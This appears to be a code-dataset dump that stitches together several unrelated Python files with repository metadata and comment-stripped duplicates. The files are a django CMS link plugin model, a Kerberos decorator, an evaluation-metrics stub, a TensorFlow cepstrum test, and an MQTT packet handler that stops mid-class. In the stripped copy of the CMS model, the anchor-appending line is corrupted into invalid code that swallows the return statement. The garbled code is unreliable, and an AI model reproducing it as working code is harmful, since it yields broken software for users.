1c4a75959aba89da3bf8a9fad406f6e1008f3883 | 7,491 | py | Python | cmsplugin_filer_link2/models.py | tobifroe/djangocms-link2 | 75780b0259df5d403b4648522404cae9768f76d2 | [
"BSD-3-Clause"
] | null | null | null | cmsplugin_filer_link2/models.py | tobifroe/djangocms-link2 | 75780b0259df5d403b4648522404cae9768f76d2 | [
"BSD-3-Clause"
] | null | null | null | cmsplugin_filer_link2/models.py | tobifroe/djangocms-link2 | 75780b0259df5d403b4648522404cae9768f76d2 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.urls.exceptions import NoReverseMatch
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from cms.models import CMSPlugin
from filer.fields.file import FilerFileField
from djangocms_attributes_field.fields import AttributesField
from cmsplugin_filer_link2.fields import Select2PageField
from cmsplugin_filer_link2.validators import validate_anchor_id
DEFULT_LINK_STYLES = (
(" ", "Default"),
)
LINK_STYLES = getattr(settings, "FILER_LINK_STYLES", DEFULT_LINK_STYLES)
EXCLUDED_KEYS = ['class', 'href', 'target', ]
@python_2_unicode_compatible
class FilerLink2Plugin(CMSPlugin):
name = models.CharField(_('name'), max_length=255)
url = models.CharField(_('url'), blank=True, null=True, max_length=2000,
help_text=_('The url must specify the protocol, e.g. https://DOMAIN.tld'))
page_link = Select2PageField(
verbose_name=_('page'),
blank=True,
null=True,
on_delete=models.SET_NULL,
)
persistent_page_link = models.CharField(_('internal url'), blank=True, null=True, max_length=2000)
mailto = models.EmailField(_('mailto'), blank=True, null=True, max_length=254)
link_style = models.CharField(_('link style'), max_length=255,
choices=LINK_STYLES, default=LINK_STYLES[0][0])
new_window = models.BooleanField(_('new window?'), default=False,
help_text=_('Do you want this link to open a new window?'))
file = FilerFileField(blank=True, null=True, on_delete=models.SET_NULL)
link_attributes = AttributesField(excluded_keys=EXCLUDED_KEYS, blank=True,
help_text=_('Optional. Adds HTML attributes to the rendered link.'))
encrypt_mailto = models.BooleanField(_('Encryption of Mailto'), default=False,
help_text=_('Encrypt the mailto, as protection against bots collecting mails '
'addresses.'))
anchor_id = models.CharField(
_('Anchor ID'),
blank=True,
max_length=100,
validators=[validate_anchor_id]
)
cmsplugin_ptr = models.OneToOneField(
to=CMSPlugin,
on_delete=models.CASCADE,
related_name='%(app_label)s_%(class)s',
parent_link=True,
)
def __str__(self):
return self.name
def clean(self):
super(FilerLink2Plugin, self).clean()
configured_destinations = [d for d in
('url', 'page_link', 'mailto', 'file')
if getattr(self, d) is not None and getattr(self, d) != '']
if len(configured_destinations) == 0:
raise ValidationError(_('Please choose a destination'))
elif len(configured_destinations) > 1:
raise ValidationError(
_('Please only choose one destination! You set: {}'.format(', '.join(configured_destinations))))
def save(self, *args, **kwargs):
super(FilerLink2Plugin, self).save(*args, **kwargs)
# delete link health state
LinkHealthState.objects.filter(link=self).delete()
def get_encrypted_mailto(self):
name, domain = self.mailto.split('@')
return 'javascript:window.location.href = \'mailto:\' + [\'{}\', \'{}\'].join(\'@\')'.format(name, domain)
def get_name(self):
if self.encrypt_mailto and self.mailto:
if self.name == self.mailto:
name, domain = self.name.split('@')
# escape name and domain for security reasons
return mark_safe('{}<!---->@<!---->{}'.format(escape(name), escape(domain)))
else:
return self.name
def get_link(self):
if self.file:
link = self.file.url
elif self.mailto:
if self.encrypt_mailto:
link = _(self.get_encrypted_mailto())
else:
link = 'mailto:{}'.format(_(self.mailto))
elif self.url:
link = _(self.url)
elif self.page_link:
try:
link = self.page_link.get_absolute_url()
except NoReverseMatch:
# if this internal link doesn't work anymore, we mark it not reachable
self.set_linkstate(LinkHealthState.NOT_REACHABLE)
# return old internal link and send user to 404
link = self.persistent_page_link
else:
# check if the target page has been moved or renamed and update accordingly
if link != self.persistent_page_link:
self.persistent_page_link = link
self.save()
elif self.persistent_page_link:
# happens when this link instance pointed to a removed page
self.set_linkstate(LinkHealthState.NOT_REACHABLE)
link = self.persistent_page_link
else:
link = ''
# Append anchor ID to url
if self.anchor_id:
link += '#{}'.format(self.anchor_id)
return link or ''
def set_linkstate(self, state):
if state is None:
LinkHealthState.objects.filter(link=self).delete()
else:
LinkHealthState.objects.update_or_create(link=self, defaults={'state': state})
def get_linkstate(self):
try:
return self.linkhealth.state
except ObjectDoesNotExist:
return None
@property
def active_destination(self):
""" The active destination determines which destination tab should be set to active. If the field is not set
yet, we return None
:return: field_name: str
"""
configured_destinations = [d for d in
('url', 'page_link', 'mailto', 'file')
if getattr(self, d) is not None and getattr(self, d) != '']
if len(configured_destinations) == 0:
return None
return configured_destinations[0]
@python_2_unicode_compatible
class LinkHealthState(models.Model):
NOT_REACHABLE = '4xx'
REDIRECT = '3xx'
SERVER_ERROR = '5xx'
BAD_CONFIGURED = 'bad'
TIMEOUT = 'to'
LINK_STATES = (
(REDIRECT, _('Redirected')),
(NOT_REACHABLE, _('Not reachable')),
(SERVER_ERROR, _('Server error')),
(BAD_CONFIGURED, _('Bad configured')),
(TIMEOUT, _('Timeout')),
)
link = models.OneToOneField(
FilerLink2Plugin,
on_delete=models.CASCADE,
unique=True,
related_name='linkhealth',
verbose_name=_('Link name')
)
state = models.CharField(max_length=3, choices=LINK_STATES, verbose_name=_('State'))
detected = models.DateTimeField(auto_now=True, verbose_name=_('Detected on'),
help_text=_('Date and time when the faulty link state was detected.'))
def __str__(self):
return _(u'Link state for: {}').format(self.link.name)
class Meta:
verbose_name = _('Link Health State')
verbose_name_plural = _('Link Health States')
| 38.415385 | 119 | 0.611 | from __future__ import unicode_literals
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.urls.exceptions import NoReverseMatch
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from cms.models import CMSPlugin
from filer.fields.file import FilerFileField
from djangocms_attributes_field.fields import AttributesField
from cmsplugin_filer_link2.fields import Select2PageField
from cmsplugin_filer_link2.validators import validate_anchor_id
DEFULT_LINK_STYLES = (
(" ", "Default"),
)
LINK_STYLES = getattr(settings, "FILER_LINK_STYLES", DEFULT_LINK_STYLES)
EXCLUDED_KEYS = ['class', 'href', 'target', ]
@python_2_unicode_compatible
class FilerLink2Plugin(CMSPlugin):
name = models.CharField(_('name'), max_length=255)
url = models.CharField(_('url'), blank=True, null=True, max_length=2000,
help_text=_('The url must specify the protocol, e.g. https://DOMAIN.tld'))
page_link = Select2PageField(
verbose_name=_('page'),
blank=True,
null=True,
on_delete=models.SET_NULL,
)
persistent_page_link = models.CharField(_('internal url'), blank=True, null=True, max_length=2000)
mailto = models.EmailField(_('mailto'), blank=True, null=True, max_length=254)
link_style = models.CharField(_('link style'), max_length=255,
choices=LINK_STYLES, default=LINK_STYLES[0][0])
new_window = models.BooleanField(_('new window?'), default=False,
help_text=_('Do you want this link to open a new window?'))
file = FilerFileField(blank=True, null=True, on_delete=models.SET_NULL)
link_attributes = AttributesField(excluded_keys=EXCLUDED_KEYS, blank=True,
help_text=_('Optional. Adds HTML attributes to the rendered link.'))
encrypt_mailto = models.BooleanField(_('Encryption of Mailto'), default=False,
help_text=_('Encrypt the mailto, as protection against bots collecting mails '
'addresses.'))
anchor_id = models.CharField(
_('Anchor ID'),
blank=True,
max_length=100,
validators=[validate_anchor_id]
)
cmsplugin_ptr = models.OneToOneField(
to=CMSPlugin,
on_delete=models.CASCADE,
related_name='%(app_label)s_%(class)s',
parent_link=True,
)
def __str__(self):
return self.name
def clean(self):
super(FilerLink2Plugin, self).clean()
configured_destinations = [d for d in
('url', 'page_link', 'mailto', 'file')
if getattr(self, d) is not None and getattr(self, d) != '']
if len(configured_destinations) == 0:
raise ValidationError(_('Please choose a destination'))
elif len(configured_destinations) > 1:
raise ValidationError(
_('Please only choose one destination! You set: {}'.format(', '.join(configured_destinations))))
def save(self, *args, **kwargs):
super(FilerLink2Plugin, self).save(*args, **kwargs)
LinkHealthState.objects.filter(link=self).delete()
def get_encrypted_mailto(self):
name, domain = self.mailto.split('@')
return 'javascript:window.location.href = \'mailto:\' + [\'{}\', \'{}\'].join(\'@\')'.format(name, domain)
def get_name(self):
if self.encrypt_mailto and self.mailto:
if self.name == self.mailto:
name, domain = self.name.split('@')
return mark_safe('{}<!---->@<!---->{}'.format(escape(name), escape(domain)))
else:
return self.name
def get_link(self):
if self.file:
link = self.file.url
elif self.mailto:
if self.encrypt_mailto:
link = _(self.get_encrypted_mailto())
else:
link = 'mailto:{}'.format(_(self.mailto))
elif self.url:
link = _(self.url)
elif self.page_link:
try:
link = self.page_link.get_absolute_url()
except NoReverseMatch:
self.set_linkstate(LinkHealthState.NOT_REACHABLE)
# return old internal link and send user to 404
link = self.persistent_page_link
else:
# check if the target page has been moved or renamed and update accordingly
if link != self.persistent_page_link:
self.persistent_page_link = link
self.save()
elif self.persistent_page_link:
# happens when this link instance pointed to a removed page
self.set_linkstate(LinkHealthState.NOT_REACHABLE)
link = self.persistent_page_link
else:
link = ''
# Append anchor ID to url
if self.anchor_id:
link += ' return link or ''
def set_linkstate(self, state):
if state is None:
LinkHealthState.objects.filter(link=self).delete()
else:
LinkHealthState.objects.update_or_create(link=self, defaults={'state': state})
def get_linkstate(self):
try:
return self.linkhealth.state
except ObjectDoesNotExist:
return None
@property
def active_destination(self):
configured_destinations = [d for d in
('url', 'page_link', 'mailto', 'file')
if getattr(self, d) is not None and getattr(self, d) != '']
if len(configured_destinations) == 0:
return None
return configured_destinations[0]
@python_2_unicode_compatible
class LinkHealthState(models.Model):
NOT_REACHABLE = '4xx'
REDIRECT = '3xx'
SERVER_ERROR = '5xx'
BAD_CONFIGURED = 'bad'
TIMEOUT = 'to'
LINK_STATES = (
(REDIRECT, _('Redirected')),
(NOT_REACHABLE, _('Not reachable')),
(SERVER_ERROR, _('Server error')),
(BAD_CONFIGURED, _('Bad configured')),
(TIMEOUT, _('Timeout')),
)
link = models.OneToOneField(
FilerLink2Plugin,
on_delete=models.CASCADE,
unique=True,
related_name='linkhealth',
verbose_name=_('Link name')
)
state = models.CharField(max_length=3, choices=LINK_STATES, verbose_name=_('State'))
detected = models.DateTimeField(auto_now=True, verbose_name=_('Detected on'),
help_text=_('Date and time when the faulty link state was detected.'))
def __str__(self):
return _(u'Link state for: {}').format(self.link.name)
class Meta:
verbose_name = _('Link Health State')
verbose_name_plural = _('Link Health States')
| true | true |
1c4a75e892d60a1d12ff20ec2dff431ecbc0002b | 257 | py | Python | lib/errata/decorators.py | adarshtri/art-dashboard-server | c6c61147d49aa43b6e2892ce07d8a115c1478b0c | [
"Apache-2.0"
] | 1 | 2020-09-21T06:48:47.000Z | 2020-09-21T06:48:47.000Z | lib/errata/decorators.py | adarshtri/art-dashboard-server | c6c61147d49aa43b6e2892ce07d8a115c1478b0c | [
"Apache-2.0"
] | 5 | 2021-02-05T19:43:08.000Z | 2021-06-04T23:23:29.000Z | lib/errata/decorators.py | adarshtri/art-dashboard-server | c6c61147d49aa43b6e2892ce07d8a115c1478b0c | [
"Apache-2.0"
] | 6 | 2021-02-06T07:21:37.000Z | 2021-06-07T12:40:37.000Z | from lib.errata.kerberos import handle_kinit
import functools
def update_keytab(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
handle_kinit()
func_ret = func(*args, **kwargs)
return func_ret
return wrapper
| 21.416667 | 44 | 0.673152 | from lib.errata.kerberos import handle_kinit
import functools
def update_keytab(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
handle_kinit()
func_ret = func(*args, **kwargs)
return func_ret
return wrapper
| true | true |
1c4a76055960b4b25afce3760c920e7649074f56 | 516 | py | Python | Evulation_Script.py | OpenVessel/RedTinSaintBernard-for-BraTS2021-challenge | dafe6f33ff6269869377d01a014ab1528b0f1c1d | [
"MIT"
] | null | null | null | Evulation_Script.py | OpenVessel/RedTinSaintBernard-for-BraTS2021-challenge | dafe6f33ff6269869377d01a014ab1528b0f1c1d | [
"MIT"
] | null | null | null | Evulation_Script.py | OpenVessel/RedTinSaintBernard-for-BraTS2021-challenge | dafe6f33ff6269869377d01a014ab1528b0f1c1d | [
"MIT"
] | null | null | null |
### How the output of the model will be evulated is with
## Dice score
##
#https://pypi.org/project/MedPy/0.4.0/
## https://loli.github.io/medpy/_modules/medpy/metric/binary.html
### HAUSDORFF DISTANCE
###https://en.wikipedia.org/wiki/Hausdorff_distance
## https://en.wikipedia.org/wiki/S%C3%B8rensen%E2%80%93Dice_coefficient
## DICE SCORE
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.dice.html
# https://www.kaggle.com/c/understanding_cloud_organization/discussion/114093 | 28.666667 | 87 | 0.753876 | true | true |
|
1c4a763ee76b213d17c59a4865ede3a3b254073f | 1,805 | py | Python | delta/data/frontend/cepstrum_test.py | luffywalf/delta | 7eb4e3be578a680737616efff6858d280595ff48 | [
"Apache-2.0"
] | 1 | 2019-10-27T08:15:22.000Z | 2019-10-27T08:15:22.000Z | delta/data/frontend/cepstrum_test.py | luffywalf/delta | 7eb4e3be578a680737616efff6858d280595ff48 | [
"Apache-2.0"
] | null | null | null | delta/data/frontend/cepstrum_test.py | luffywalf/delta | 7eb4e3be578a680737616efff6858d280595ff48 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2017 Beijing Didi Infinity Technology and Development Co.,Ltd.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import tensorflow as tf
import os
from pathlib import Path
from delta.data.frontend.read_wav import ReadWav
from delta.data.frontend.cepstrum import Cepstrum
import numpy as np
class CepstrumTest(tf.test.TestCase):
def test_cepstrum(self):
wav_path = str(
Path(os.environ['MAIN_ROOT']).joinpath('delta/layers/ops/data/sm1_cln.wav'))
with self.session():
read_wav = ReadWav.params().instantiate()
input_data, sample_rate = read_wav.call(wav_path)
cepstrum = Cepstrum.params({'window_length':0.025}).instantiate()
cepstrum_test = cepstrum(input_data, sample_rate)
output_true = np.array(
[[0.525808, 0.579537, 0.159656, 0.014726, -0.1866810],
[0.225988, 1.557304, 3.381828, 0.132935, 0.7128600],
[-1.832759, -1.045178, 0.753158, 0.116107, -0.9307780],
[-0.696277, 1.333355, 1.590942, 2.041829, -0.0805630],
[-0.377375, 2.984320, 0.036302, 3.676640, 1.1709290]])
self.assertAllClose(cepstrum_test.eval()[15:20, 7:12], output_true)
if __name__ == '__main__':
tf.test.main()
| 37.604167 | 82 | 0.677562 |
import tensorflow as tf
import os
from pathlib import Path
from delta.data.frontend.read_wav import ReadWav
from delta.data.frontend.cepstrum import Cepstrum
import numpy as np
class CepstrumTest(tf.test.TestCase):
def test_cepstrum(self):
wav_path = str(
Path(os.environ['MAIN_ROOT']).joinpath('delta/layers/ops/data/sm1_cln.wav'))
with self.session():
read_wav = ReadWav.params().instantiate()
input_data, sample_rate = read_wav.call(wav_path)
cepstrum = Cepstrum.params({'window_length':0.025}).instantiate()
cepstrum_test = cepstrum(input_data, sample_rate)
output_true = np.array(
[[0.525808, 0.579537, 0.159656, 0.014726, -0.1866810],
[0.225988, 1.557304, 3.381828, 0.132935, 0.7128600],
[-1.832759, -1.045178, 0.753158, 0.116107, -0.9307780],
[-0.696277, 1.333355, 1.590942, 2.041829, -0.0805630],
[-0.377375, 2.984320, 0.036302, 3.676640, 1.1709290]])
self.assertAllClose(cepstrum_test.eval()[15:20, 7:12], output_true)
if __name__ == '__main__':
tf.test.main()
| true | true |
1c4a77766df324feef1c4233c8317b9f927125b0 | 14,874 | py | Python | gmqtt/mqtt/handler.py | liamdiprose/gmqtt | 4fb92a9629fc57c885f5e07c46b951c4f45e9572 | [
"MIT"
] | null | null | null | gmqtt/mqtt/handler.py | liamdiprose/gmqtt | 4fb92a9629fc57c885f5e07c46b951c4f45e9572 | [
"MIT"
] | null | null | null | gmqtt/mqtt/handler.py | liamdiprose/gmqtt | 4fb92a9629fc57c885f5e07c46b951c4f45e9572 | [
"MIT"
] | null | null | null | import asyncio
import logging
import struct
import time
from asyncio import iscoroutinefunction
from collections import defaultdict
from copy import deepcopy
from functools import partial
from .utils import unpack_variable_byte_integer, IdGenerator, run_coroutine_or_function
from .property import Property
from .protocol import MQTTProtocol
from .constants import MQTTCommands, PubAckReasonCode, PubRecReasonCode, DEFAULT_CONFIG
from .constants import MQTTv311, MQTTv50
logger = logging.getLogger(__name__)
def _empty_callback(*args, **kwargs):
pass
class MQTTError(Exception):
pass
class MQTTConnectError(MQTTError):
__messages__ = {
1: "Connection Refused: unacceptable protocol version",
2: "Connection Refused: identifier rejected",
3: "Connection Refused: broker unavailable",
4: "Connection Refused: bad user name or password",
5: "Connection Refused: not authorised",
10: 'Cannot handle CONNACK package',
128: "Connection Refused: Unspecified error",
129: "Connection Refused: Malformed Packet",
130: "Connection Refused: Protocol Error",
131: "Connection Refused: Implementation specific error",
132: "Connection Refused: Unsupported Protocol Version",
133: "Connection Refused: Client Identifier not valid",
134: "Connection Refused: Bad User Name or Password",
135: "Connection Refused: Not authorized",
136: "Connection Refused: Server unavailable",
137: "Connection Refused: Server busy",
138: "Connection Refused: Banned",
140: "Connection Refused: Bad authentication method",
144: "Connection Refused: Topic Name invalid",
149: "Connection Refused: Packet too large",
151: "Connection Refused: Quota exceeded",
153: "Connection Refused: Payload format invalid",
154: "Connection Refused: Retain not supported",
155: "Connection Refused: QoS not supported",
156: "Connection Refused: Use another server",
157: "Connection Refused: Server moved",
159: "Connection Refused: Connection rate exceeded",
}
def __init__(self, code):
self._code = code
self.message = self.__messages__.get(code, 'Unknown error')\
def __str__(self):
return "code {} ({})".format(self._code, self.message)
class EventCallback(object):
def __init__(self, *args, **kwargs):
super(EventCallback, self).__init__()
self._connected = asyncio.Event()
self._on_connected_callback = _empty_callback
self._on_disconnected_callback = _empty_callback
self._on_message_callback = _empty_callback
self._on_subscribe_callback = _empty_callback
self._on_unsubscribe_callback = _empty_callback
self._config = deepcopy(DEFAULT_CONFIG)
self._reconnects_config_cache = None
self.failed_connections = 0
def _temporatily_stop_reconnect(self):
self._reconnects_config_cache = self._config['reconnect_retries']
self.stop_reconnect()
def _restore_config(self):
if self._reconnects_config_cache is not None:
self._config['reconnect_retries'] = self._reconnects_config_cache
def stop_reconnect(self):
self._config['reconnect_retries'] = 0
def set_config(self, config):
self._config.update(config)
@property
def _reconnect(self):
if self.reconnect_retries == -1:
return True
return bool(self.reconnect_retries)
@property
def reconnect_delay(self):
return self._config['reconnect_delay']
@property
def reconnect_retries(self):
return self._config['reconnect_retries']
@property
def on_subscribe(self):
return self._on_subscribe_callback
@on_subscribe.setter
def on_subscribe(self, cb):
if not callable(cb):
raise ValueError
self._on_subscribe_callback = cb
@property
def on_connect(self):
return self._on_connected_callback
@on_connect.setter
def on_connect(self, cb):
if not callable(cb):
raise ValueError
self._on_connected_callback = cb
@property
def on_message(self):
return self._on_message_callback
@on_message.setter
def on_message(self, cb):
if not callable(cb):
raise ValueError
self._on_message_callback = cb
@property
def on_disconnect(self):
return self._on_disconnected_callback
@on_disconnect.setter
def on_disconnect(self, cb):
if not callable(cb):
raise ValueError
self._on_disconnected_callback = cb
@property
def on_unsubscribe(self):
return self._on_unsubscribe_callback
@on_unsubscribe.setter
def on_unsubscribe(self, cb):
if not callable(cb):
raise ValueError
self._on_unsubscribe_callback = cb
class MqttPackageHandler(EventCallback):
def __init__(self, *args, **kwargs):
super(MqttPackageHandler, self).__init__(*args, **kwargs)
self._messages_in = {}
self._handler_cache = {}
self._error = None
self._connection = None
self._id_generator = IdGenerator(max=kwargs.get('receive_maximum', 65535))
if self.protocol_version == MQTTv50:
self._optimistic_acknowledgement = kwargs.get('optimistic_acknowledgement', True)
else:
self._optimistic_acknowledgement = True
def _send_command_with_mid(self, cmd, mid, dup, reason_code=0):
raise NotImplementedError
def _remove_message_from_query(self, mid):
raise NotImplementedError
def _send_puback(self, mid, reason_code=0):
self._send_command_with_mid(MQTTCommands.PUBACK, mid, False, reason_code=reason_code)
def _send_pubrec(self, mid, reason_code=0):
self._send_command_with_mid(MQTTCommands.PUBREC, mid, False, reason_code=reason_code)
def _send_pubrel(self, mid, dup, reason_code=0):
self._send_command_with_mid(MQTTCommands.PUBREL | 2, mid, dup, reason_code=reason_code)
def __get_handler__(self, cmd):
cmd_type = cmd & 0xF0
if cmd_type not in self._handler_cache:
handler_name = '_handle_{}_packet'.format(MQTTCommands(cmd_type).name.lower())
self._handler_cache[cmd_type] = getattr(self, handler_name, self._default_handler)
return self._handler_cache[cmd_type]
def _handle_packet(self, cmd, packet):
logger.debug('[CMD %s] %s', hex(cmd), packet)
handler = self.__get_handler__(cmd)
handler(cmd, packet)
self._last_msg_in = time.monotonic()
def _handle_exception_in_future(self, future):
if not future.exception():
return
self.on_disconnect(self, packet=None, exc=future.exception())
def _default_handler(self, cmd, packet):
logger.warning('[UNKNOWN CMD] %s %s', hex(cmd), packet)
def _handle_disconnect_packet(self, cmd, packet):
if self._reconnect:
future = asyncio.ensure_future(self.reconnect(delay=True))
future.add_done_callback(self._handle_exception_in_future)
self.on_disconnect(self, packet)
def _parse_properties(self, packet):
if self.protocol_version < MQTTv50:
# If protocol is version is less than 5.0, there is no properties in packet
return {}, packet
properties_len, left_packet = unpack_variable_byte_integer(packet)
packet = left_packet[:properties_len]
left_packet = left_packet[properties_len:]
properties_dict = defaultdict(list)
while packet:
property_identifier, = struct.unpack("!B", packet[:1])
property_obj = Property.factory(id_=property_identifier)
if property_obj is None:
logger.critical('[PROPERTIES] received invalid property id {}, disconnecting'.format(property_identifier))
return None, None
result, packet = property_obj.loads(packet[1:])
for k, v in result.items():
properties_dict[k].append(v)
properties_dict = dict(properties_dict)
return properties_dict, left_packet
def _handle_connack_packet(self, cmd, packet):
self._connected.set()
(flags, result) = struct.unpack("!BB", packet[:2])
if result != 0:
logger.warning('[CONNACK] %s', hex(result))
self.failed_connections += 1
if result == 1 and self.protocol_version == MQTTv50:
logger.info('[CONNACK] Downgrading to MQTT 3.1 protocol version')
MQTTProtocol.proto_ver = MQTTv311
future = asyncio.ensure_future(self.reconnect(delay=True))
future.add_done_callback(self._handle_exception_in_future)
return
else:
self._error = MQTTConnectError(result)
if self._reconnect:
asyncio.ensure_future(self.reconnect(delay=True))
return
else:
self.failed_connections = 0
if len(packet) > 2:
properties, _ = self._parse_properties(packet[2:])
if properties is None:
self._error = MQTTConnectError(10)
asyncio.ensure_future(self.disconnect())
self._connack_properties = properties
# TODO: Implement checking for the flags and results
# see 3.2.2.3 Connect Return code of the http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.pdf
logger.debug('[CONNACK] flags: %s, result: %s', hex(flags), hex(result))
self.on_connect(self, flags, result, self.properties)
def _handle_publish_packet(self, cmd, raw_packet):
header = cmd
dup = (header & 0x08) >> 3
qos = (header & 0x06) >> 1
retain = header & 0x01
pack_format = "!H" + str(len(raw_packet) - 2) + 's'
(slen, packet) = struct.unpack(pack_format, raw_packet)
pack_format = '!' + str(slen) + 's' + str(len(packet) - slen) + 's'
(topic, packet) = struct.unpack(pack_format, packet)
if not topic:
logger.warning('[MQTT ERR PROTO] topic name is empty')
return
try:
print_topic = topic.decode('utf-8')
except UnicodeDecodeError as exc:
logger.warning('[INVALID CHARACTER IN TOPIC] %s', topic, exc_info=exc)
print_topic = topic
payload = packet
logger.debug('[RECV %s with QoS: %s] %s', print_topic, qos, payload)
if qos > 0:
pack_format = "!H" + str(len(packet) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, packet)
else:
mid = None
properties, packet = self._parse_properties(packet)
properties['dup'] = dup
properties['retain'] = retain
if packet is None:
logger.critical('[INVALID MESSAGE] skipping: {}'.format(raw_packet))
return
if qos == 0:
run_coroutine_or_function(self.on_message, self, print_topic, packet, qos, properties)
elif qos == 1:
self._handle_qos_1_publish_packet(mid, packet, print_topic, properties)
elif qos == 2:
self._handle_qos_2_publish_packet(mid, packet, print_topic, properties)
self._id_generator.free_id(mid)
def _handle_qos_2_publish_packet(self, mid, packet, print_topic, properties):
if self._optimistic_acknowledgement:
self._send_pubrec(mid)
run_coroutine_or_function(self.on_message, self, print_topic, packet, 2, properties)
else:
run_coroutine_or_function(self.on_message, self, print_topic, packet, 2, properties,
callback=partial(self.__handle_publish_callback, qos=2, mid=mid))
def __handle_publish_callback(self, f, qos=None, mid=None):
reason_code = f.result()
if reason_code not in (c.value for c in PubRecReasonCode):
raise ValueError('Invalid PUBREC reason code {}'.format(reason_code))
if qos == 2:
self._send_pubrec(mid, reason_code=reason_code)
else:
self._send_puback(mid, reason_code=reason_code)
self._id_generator.free_id(mid)
def _handle_qos_1_publish_packet(self, mid, packet, print_topic, properties):
if self._optimistic_acknowledgement:
self._send_puback(mid)
run_coroutine_or_function(self.on_message, self, print_topic, packet, 1, properties)
else:
run_coroutine_or_function(self.on_message, self, print_topic, packet, 1, properties,
callback=partial(self.__handle_publish_callback, qos=1, mid=mid))
def __call__(self, cmd, packet):
try:
result = self._handle_packet(cmd, packet)
except Exception as exc:
logger.error('[ERROR HANDLE PKG]', exc_info=exc)
result = None
return result
def _handle_suback_packet(self, cmd, raw_packet):
pack_format = "!H" + str(len(raw_packet) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, raw_packet)
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
logger.info('[SUBACK] %s %s', mid, granted_qos)
self.on_subscribe(self, mid, granted_qos)
self._id_generator.free_id(mid)
def _handle_unsuback_packet(self, cmd, raw_packet):
pack_format = "!H" + str(len(raw_packet) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, raw_packet)
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
logger.info('[UNSUBACK] %s %s', mid, granted_qos)
self.on_unsubscribe(self, mid, granted_qos)
self._id_generator.free_id(mid)
def _handle_pingreq_packet(self, cmd, packet):
logger.debug('[PING REQUEST] %s %s', hex(cmd), packet)
pass
def _handle_pingresp_packet(self, cmd, packet):
logger.debug('[PONG REQUEST] %s %s', hex(cmd), packet)
def _handle_puback_packet(self, cmd, packet):
(mid, ) = struct.unpack("!H", packet[:2])
# TODO: For MQTT 5.0 parse reason code and properties
logger.info('[RECEIVED PUBACK FOR] %s', mid)
self._id_generator.free_id(mid)
self._remove_message_from_query(mid)
def _handle_pubcomp_packet(self, cmd, packet):
pass
def _handle_pubrec_packet(self, cmd, packet):
pass
def _handle_pubrel_packet(self, cmd, packet):
mid, = struct.unpack("!H", packet)
self._id_generator.free_id(mid)
if mid not in self._messages_in:
return
topic, payload, qos = self._messages_in[mid]
| 36.189781 | 122 | 0.646699 | import asyncio
import logging
import struct
import time
from asyncio import iscoroutinefunction
from collections import defaultdict
from copy import deepcopy
from functools import partial
from .utils import unpack_variable_byte_integer, IdGenerator, run_coroutine_or_function
from .property import Property
from .protocol import MQTTProtocol
from .constants import MQTTCommands, PubAckReasonCode, PubRecReasonCode, DEFAULT_CONFIG
from .constants import MQTTv311, MQTTv50
logger = logging.getLogger(__name__)
def _empty_callback(*args, **kwargs):
pass
class MQTTError(Exception):
pass
class MQTTConnectError(MQTTError):
__messages__ = {
1: "Connection Refused: unacceptable protocol version",
2: "Connection Refused: identifier rejected",
3: "Connection Refused: broker unavailable",
4: "Connection Refused: bad user name or password",
5: "Connection Refused: not authorised",
10: 'Cannot handle CONNACK package',
128: "Connection Refused: Unspecified error",
129: "Connection Refused: Malformed Packet",
130: "Connection Refused: Protocol Error",
131: "Connection Refused: Implementation specific error",
132: "Connection Refused: Unsupported Protocol Version",
133: "Connection Refused: Client Identifier not valid",
134: "Connection Refused: Bad User Name or Password",
135: "Connection Refused: Not authorized",
136: "Connection Refused: Server unavailable",
137: "Connection Refused: Server busy",
138: "Connection Refused: Banned",
140: "Connection Refused: Bad authentication method",
144: "Connection Refused: Topic Name invalid",
149: "Connection Refused: Packet too large",
151: "Connection Refused: Quota exceeded",
153: "Connection Refused: Payload format invalid",
154: "Connection Refused: Retain not supported",
155: "Connection Refused: QoS not supported",
156: "Connection Refused: Use another server",
157: "Connection Refused: Server moved",
159: "Connection Refused: Connection rate exceeded",
}
def __init__(self, code):
self._code = code
self.message = self.__messages__.get(code, 'Unknown error')\
def __str__(self):
return "code {} ({})".format(self._code, self.message)
class EventCallback(object):
def __init__(self, *args, **kwargs):
super(EventCallback, self).__init__()
self._connected = asyncio.Event()
self._on_connected_callback = _empty_callback
self._on_disconnected_callback = _empty_callback
self._on_message_callback = _empty_callback
self._on_subscribe_callback = _empty_callback
self._on_unsubscribe_callback = _empty_callback
self._config = deepcopy(DEFAULT_CONFIG)
self._reconnects_config_cache = None
self.failed_connections = 0
def _temporatily_stop_reconnect(self):
self._reconnects_config_cache = self._config['reconnect_retries']
self.stop_reconnect()
def _restore_config(self):
if self._reconnects_config_cache is not None:
self._config['reconnect_retries'] = self._reconnects_config_cache
def stop_reconnect(self):
self._config['reconnect_retries'] = 0
def set_config(self, config):
self._config.update(config)
@property
def _reconnect(self):
if self.reconnect_retries == -1:
return True
return bool(self.reconnect_retries)
@property
def reconnect_delay(self):
return self._config['reconnect_delay']
@property
def reconnect_retries(self):
return self._config['reconnect_retries']
@property
def on_subscribe(self):
return self._on_subscribe_callback
@on_subscribe.setter
